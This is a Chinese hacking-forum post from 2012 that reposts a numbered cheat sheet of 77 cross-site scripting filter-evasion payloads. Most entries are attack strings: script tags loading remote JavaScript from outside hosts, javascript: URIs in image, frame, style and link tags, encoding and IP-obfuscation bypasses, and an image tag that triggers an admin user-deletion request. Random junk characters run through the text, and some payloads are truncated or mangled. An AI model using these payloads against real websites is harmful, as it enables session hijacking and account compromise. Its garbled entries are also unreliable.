貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。 t' N0 e" H* A4 i2 z. a
; K3 {! y4 A! n+ _ (1)普通的XSS JavaScript注入. M7 G% r7 ?4 T. Z/ d) f
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>' Y0 B+ {7 {" Y, Q. y4 Q' n* z$ q
# F5 b$ F s& C' } (2)IMG标签XSS使用JavaScript命令4 n( d3 E* N2 R
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>; M4 C; u% ?3 R# \
a% V7 U9 P7 P
(3)IMG标签无分号无引号
. {( k+ G% S/ U0 g* @1 w0 k$ Z3 y <IMG SRC=javascript:alert(‘XSS’)>8 |; E3 A+ n) a0 w( Z
0 {7 A5 g9 V+ W
(4)IMG标签大小写不敏感* P- z5 K0 F* j, \
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>( o3 m, l8 K) s/ D: L' a6 n" Q
, M7 ^ ~+ [( {8 e
(5)HTML编码(必须有分号)% f9 ]2 {* `9 e( s+ }% P
<IMG SRC=javascript:alert(“XSS”)>
3 E/ r0 M$ Q# S7 R- \% t1 q) v6 ? H
(6)修正缺陷IMG标签
& N$ _( l+ |5 B' C% \9 A8 S! ^ <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
4 d6 A9 |6 g8 |8 r- Y) o& S V9 J! G2 f+ O( e
(7)formCharCode标签(计算器)
0 J2 ]2 a: k7 D s; j1 X5 V6 \" @ <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; E( M. ?2 d$ i5 ~: u
0 \9 x7 c9 }8 p (8)UTF-8的Unicode编码(计算器)! Y1 U( Z# B1 ?
<IMG SRC=jav..省略..S')>- F% Y6 Q- C# H) A- w0 ^
+ u% \% O- \% Q }; Z! B
(9)7位的UTF-8的Unicode编码是没有分号的(计算器); L! y. X) B0 _; W) U! F( T" w
<IMG SRC=jav..省略..S')>; u: ]7 S2 z) @/ [9 v# T5 ^
8 o% X$ Q! q, N0 _ (10)十六进制编码也是没有分号(计算器)
: D0 g3 ]7 t' Q' V7 X5 j <IMG SRC=java..省略..XSS')>
/ Y. B/ y; M% O( J8 y3 P7 A0 Z
! G2 ~2 d. v7 i' b: r (11)嵌入式标签,将Javascript分开
" o6 o' B }# P. \; j <IMG SRC=”jav ascript:alert(‘XSS’);”>
0 l P1 |4 t* C4 O1 C3 u3 ?, H2 x6 D+ r/ Q8 W
(12)嵌入式编码标签,将Javascript分开* G" j3 y5 d2 w- t) J
<IMG SRC=”jav ascript:alert(‘XSS’);”>! w2 G. f, |0 L
% A: c% x# A4 m' U4 `$ g: I
(13)嵌入式换行符
0 t. Z" s3 i; k <IMG SRC=”jav ascript:alert(‘XSS’);”>
2 G* m+ @1 T& t/ X ]
+ m" n8 x# p( c* }: R (14)嵌入式回车
9 u4 t. d, c/ A' n6 p! E <IMG SRC=”jav ascript:alert(‘XSS’);”>
# I7 g; x" R1 e! q) P( A
0 \! N% u! _( z! c (15)嵌入式多行注入JavaScript,这是XSS极端的例子
' D, p/ B9 I! p0 { <IMG SRC=”javascript:alert(‘XSS‘)”>
0 N6 |/ k* T* Z& y; t% R3 w8 t! x2 w$ e" s' x7 u/ t
(16)解决限制字符(要求同页面)
) {2 m# d4 |' C4 q/ S9 J+ |& \ <script>z=’document.’</script>! ~% @; G l6 d. U
<script>z=z+’write(“‘</script>
; r# q. k" p* C <script>z=z+’<script’</script>
' L5 P9 V) L9 y$ D2 _6 I <script>z=z+’ src=ht’</script>8 R ]: p4 t( {+ Z8 L9 W# l, o7 A
<script>z=z+’tp://ww’</script>, B( F+ N! O' J' R
<script>z=z+’w.shell’</script>, Z2 M0 k4 [4 p& H/ H: I! o$ a
<script>z=z+’.net/1.’</script>, |$ D2 J# p' V6 }# [2 ^9 ?; M
<script>z=z+’js></sc’</script>6 i" V, u) U5 n3 y# j
<script>z=z+’ript>”)’</script>
: o% X# C- |/ @9 K& u2 B, c, f <script>eval_r(z)</script>
( `- d! g6 ~$ A* M: U2 N5 X! o5 t- P4 p) m9 W+ T
(17)空字符4 q( c: @4 i5 v: O
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out7 v; |9 Z! k+ u. t/ Q* k% R) M& B
1 s& u i1 q3 ?: x (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用7 Q# k/ O0 P$ \ _
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out; d/ \4 X- |+ a- @
( X" L" m# j* a! _; G" }- z, U
(19)Spaces和meta前的IMG标签
7 v2 r& n1 F* F <IMG SRC=” � javascript:alert(‘XSS’);”>
$ H6 Y2 u V1 |1 n& ?. g
o: [& w) r* k1 ~& P9 J& y0 V& s (20)Non-alpha-non-digit XSS
+ S6 F N% n; A2 O% l <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
* `8 _( k: V4 p5 x2 B% k. S5 k
* Y& W) Y. a# S5 t+ n (21)Non-alpha-non-digit XSS to 29 C& p+ U' [5 n% P
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
7 o" m, p6 ?' y( F; v4 a _' y+ b! ^: s# ^5 M, z6 c @5 G! [! j# I: E- j
(22)Non-alpha-non-digit XSS to 35 e' L+ ?- j& X
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>4 D3 r) M1 r% O/ v& S
9 M3 M. Q8 s; O3 U1 p: |" e (23)双开括号7 y6 [' F) R0 j" [5 h) u Q
<<SCRIPT>alert(“XSS”);//<</SCRIPT>* |! G1 T( \2 w* }
( Q: \ k9 l3 A' Z& y8 |
(24)无结束脚本标记(仅火狐等浏览器)
5 j. a3 `7 X7 l% h+ U. K% l! } <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
( X5 e1 c# V3 C" g
7 r* j# o' x9 A (25)无结束脚本标记2 | M9 O2 }$ v5 `
<SCRIPT SRC=//3w.org/XSS/xss.js> R; v/ L3 g, _/ V! E
/ W& I& _4 H5 U6 e: h! b+ V: V (26)半开的HTML/JavaScript XSS! ~+ z0 G# @. k& P* y% a, E9 X
<IMG SRC=”javascript:alert(‘XSS’)”2 r$ E# `! ^$ z5 ~: J
$ D8 M1 H3 w& n& x1 N/ M
(27)双开角括号
( }% Q/ m+ w2 k R8 k1 Q <iframe src=http://3w.org/XSS.html <1 V# M& j! ~: L& S( f* ]5 ~( k, H
( \2 Z7 W1 q8 {$ h& J+ | (28)无单引号 双引号 分号
% ?+ }* x) j; N: Z3 J9 i9 E <SCRIPT>a=/XSS/: N- y- s: w# o
alert(a.source)</SCRIPT>0 k+ \) x# j+ t, D( x( \
- A9 K# J& ]4 D" N; | K. u) Z% B
(29)换码过滤的JavaScript' L9 _! g+ `: l9 K' T8 \& F, m' H
\”;alert(‘XSS’);//
! e i# Z9 i1 D" K& V0 _7 h
& _, u& V% Y' @. e- _ (30)结束Title标签0 ?! P) T2 [8 k) q
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>2 O( o' Y3 _4 L; I5 H8 _, c. x' z
/ c( l* X3 w' I* C8 t2 W9 x& g$ m% I (31)Input Image
) J- V, @& A _1 y2 H( p2 S <INPUT SRC=”javascript:alert(‘XSS’);”>0 }$ f' H' |" T9 ]
% B; z0 @5 Z; [, @ (32)BODY Image# M- a1 A5 B0 e3 n& A+ H* U
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>. a/ s* h2 g7 A, ^5 Z' y2 d
X X' X2 Y& w6 ~# N9 b5 F (33)BODY标签
6 x! J; ]0 {, _' c% U <BODY(‘XSS’)>
8 G4 J& F, F2 E- v
" ^* ]6 u" z$ ^6 j (34)IMG Dynsrc
9 W6 [- v% V# R$ T8 X <IMG DYNSRC=”javascript:alert(‘XSS’)”>& j3 J9 g' c0 j- b- i
6 b# x6 w. J$ \3 @
(35)IMG Lowsrc
; y: T( N7 u1 q- O. [9 B' H <IMG LOWSRC=”javascript:alert(‘XSS’)”>
" ?' Y1 J' ?! `5 D" b5 E! B6 N# g4 ^7 L
(36)BGSOUND* X: k1 @4 B& Z* L
<BGSOUND SRC=”javascript:alert(‘XSS’);”>2 ^7 ~7 ~8 z* o( [" R" x
. q0 J5 m. _1 D" ?( n, T2 R
(37)STYLE sheet" E2 Q1 ^# v8 t+ p: h
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
& i" M) E1 h( R$ A" {4 b" Q9 w: W5 n2 y! r9 l4 y
(38)远程样式表* {! E2 u0 C- _
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>' r) F" T# u$ Z2 X) C
1 N% {9 M) Y+ n9 J, u" ?
(39)List-style-image(列表式)
) d/ S$ y: }; Q/ ^+ }$ I* u <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
! m$ v Z! p5 A; x
& r6 u Y* o, @- W) \$ m& y7 i( U (40)IMG VBscript
- l# o* ]1 C+ T' J) r: T; E2 P <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS+ b4 @5 C. T- x# r( O
( p! _" R4 T. ~( t! W% g5 O; N; p
(41)META链接url
: p6 Q$ P) \2 Z0 }% ? <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
( ] B7 Z' p/ p( k2 \# B5 ~3 f: g* {* Z8 d0 [
(42)Iframe! G8 x A0 E; z7 E4 e7 H
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>/ ~5 F/ o; x. E+ |# w+ ~+ e
3 _, w* l& [( ^1 P
(43)Frame2 y L! ~! k9 o0 `" N c
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>0 c) L& Z* ^4 |! [/ w i
5 e7 ]+ X* Z5 z0 A/ g& M (44)Table
" c$ h C3 J1 D# ^3 p <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
- S3 _6 O$ {, `3 l' z0 W; ~/ [2 b6 h
(45)TD
) v+ F" X- ^4 @ <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
2 E: D! \0 B9 l5 X: u+ f
3 ]: K$ [) J" \ (46)DIV background-image
0 m3 X) \& M7 T) [/ y# d <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
7 V# p- V; o+ N: g. K
% N* d5 l% Y" ~* c+ Z* @ i (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)/ X6 F; {% @. y. F; X
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
8 Q- x. `% J( U: Z
9 _' w( {2 r9 \6 M (48)DIV expression
1 L0 m8 l& S) d8 Z- k <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
9 B$ I l' h8 i( _6 B6 N1 q; h" @* @+ Y5 |2 c7 O& V+ D! K0 O
(49)STYLE属性分拆表达
( b; e+ q' Z7 K4 T/ t9 a1 x <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>6 y& [5 K: u/ I0 U
: q9 q- d, e# M/ q4 }5 Z2 o6 X
(50)匿名STYLE(组成:开角号和一个字母开头)
g. H9 u, u8 C R6 N8 Z+ @ <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>4 `. f! Z6 T* o1 G% s9 c" f
2 E( @ N7 c; y* A6 C& D (51)STYLE background-image
3 S" \7 P+ Q# `. u( r; z <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>5 h7 C+ c" F8 }1 t. p7 r5 X
7 x# c( ~# X% H1 D1 X
(52)IMG STYLE方式0 K& k8 c- q0 p9 O
exppression(alert(“XSS”))’>
9 U/ g1 } A( Y& i7 b, H4 s9 R2 `2 ~2 ^$ c0 P6 J$ c; E9 V; K
(53)STYLE background
3 g) p) x) t# b <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>% r% c' P7 e$ [- C6 H/ c' G: V* r7 _7 l
1 m4 b3 b" d& [
(54)BASE" Z% W* Y/ M0 p2 i& z
<BASE HREF=”javascript:alert(‘XSS’);//”>
& H2 B( q8 ^9 e; B7 g" [) D
( b) V) O: W. s" } (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS; [- \9 y1 E3 b# o
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>3 \+ b+ e* {/ q
) p2 f6 \: r2 ? z: h- V (56)在flash中使用ActionScrpt可以混进你XSS的代码- t/ _: @5 {# _ ?- M
a=”get”;: T; v5 y! X% w
b=”URL(\”";1 u1 G7 y9 ^( p# X
c=”javascript:”;8 |/ c2 t7 P/ a) O* @
d=”alert(‘XSS’);\”)”;
: y& |4 f+ [3 M. G: ?: L* E1 _1 @ eval_r(a+b+c+d);7 W$ v, a, ?/ u' Q1 k1 ^
" z! Q( g- @4 g6 F" ?9 q) d (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
2 z* V ~$ ]6 B <HTML xmlns:xss>: u4 |% q# ^4 N6 `$ P- y: I# [
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
, A- [( d! r2 W" |) p <xss:xss>XSS</xss:xss>
( y, _5 [, W% h6 g </HTML>
6 k# [4 e( ~5 z+ w7 u
1 U; _$ i& ?5 X+ ` (58)如果过滤了你的JS你可以在图片里添加JS代码来利用8 J6 i; N/ Q4 i) w$ P
<SCRIPT SRC=””></SCRIPT>
; S8 ^' o2 i2 i4 [. f# z. b. x9 P3 Q
(59)IMG嵌入式命令,可执行任意命令 H& H7 a1 `$ ^" `$ t' ~
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
% u6 p# n$ B, V$ U3 I: T W0 j, [# G) G3 s1 B! B9 F: i
(60)IMG嵌入式命令(a.jpg在同服务器)- o# ]+ b( o, Q R
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
& b2 Z/ S& T) M5 L& B
; W; Q2 r* w' s) E (61)绕符号过滤
8 ?' v, `! Q0 q# e7 X; L <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 `+ m# M+ @ T' r5 l+ t8 L% z; D( g! z2 B3 k
(62)
! v, G4 y( x4 q I: K% l0 Q <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>: p2 _6 n% F' ^# p
. ]0 C5 L$ [* A$ V
(63). l. [1 T& v5 A2 a: z# ]0 P
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>7 j* d1 q5 j% x. H* G2 ]4 I R& n
1 }2 p1 e, y# G ^; L! W0 O0 U, [: A
(64)
4 b5 W x) k" V& C( h <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
9 g( Z1 L# u% y1 w) C) E4 c! _3 G# i h/ k d! G c B
(65)2 B+ g. I+ X6 O2 g2 t0 n$ a- d: ~
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>4 }. h, Z% ~# q% c; p
; l2 }& Q- {1 G5 h (66)
. X& O3 L5 o4 R0 Y! p0 i. I0 C <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 F9 A! f; R8 Y! D0 ~6 d) Z7 Q
" u7 V8 P9 q9 n/ r (67)
( Q/ m- o! A. @% ] w5 P <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>, m6 e- u* p$ h! l% }1 ?
. r6 {) _5 W2 h' t (68)URL绕行, K8 u- c/ p! y
<A HREF=”http://127.0.0.1/”>XSS</A># }) W- l! Q2 }8 t- l
# o+ i5 l+ j/ p* p6 f
(69)URL编码; M5 c' L8 S4 ]. h! N3 f
<A HREF=”http://3w.org”>XSS</A>
9 \4 E1 @9 W$ g3 A {; H& c
! n7 A4 a) K. s& ]) S+ C (70)IP十进制
# S5 R5 I# a% E- x <A HREF=”http://3232235521″>XSS</A>, T5 Y) H; Q/ }& n/ @
" d E# r0 ?" ? (71)IP十六进制
1 ?' G, ?( q. ?* n <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
+ p3 l* u& I4 ?, L0 r! \8 B# q
2 M+ e" u5 i \5 F! N' ]' C (72)IP八进制
$ L0 Z4 a8 [$ Q1 N* L <A HREF=”http://0300.0250.0000.0001″>XSS</A>
$ r& X7 ?; q* Y6 A* |8 o; B% \
(73)混合编码
# ]) ]/ ^- g/ ?- J6 B& X- I% q- e <A HREF=”h
; S2 ~! }8 ~/ p% g& X5 J" O* ]* H8 P tt p://6 6.000146.0×7.147/”">XSS</A>
7 a# O7 C7 u1 O% w; J* @2 v$ I$ b2 `4 X8 }9 D7 q
(74)节省[http:]6 {& |7 c3 d% Y' K+ v9 p4 z
<A HREF=”//www.google.com/”>XSS</A>
6 N+ n' |, C4 X3 r0 s* l, z3 U+ b2 H: u: Y' e4 e, u
(75)节省[www]
# J8 R0 p4 ]# k. W" D <A HREF=”http://google.com/”>XSS</A>6 n' y; P3 a1 C. @; T
, H5 t: h/ K6 S, f& [1 e" K9 e* H5 O$ A
(76)绝对点绝对DNS' L: G. F9 d& X/ l# i. X# C+ |
<A HREF=”http://www.google.com./”>XSS</A>" W3 i0 U0 t/ x- ?9 c
' V6 i- @+ A5 ?
(77)javascript链接) `4 s4 M4 [9 o) _" t( }7 p
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对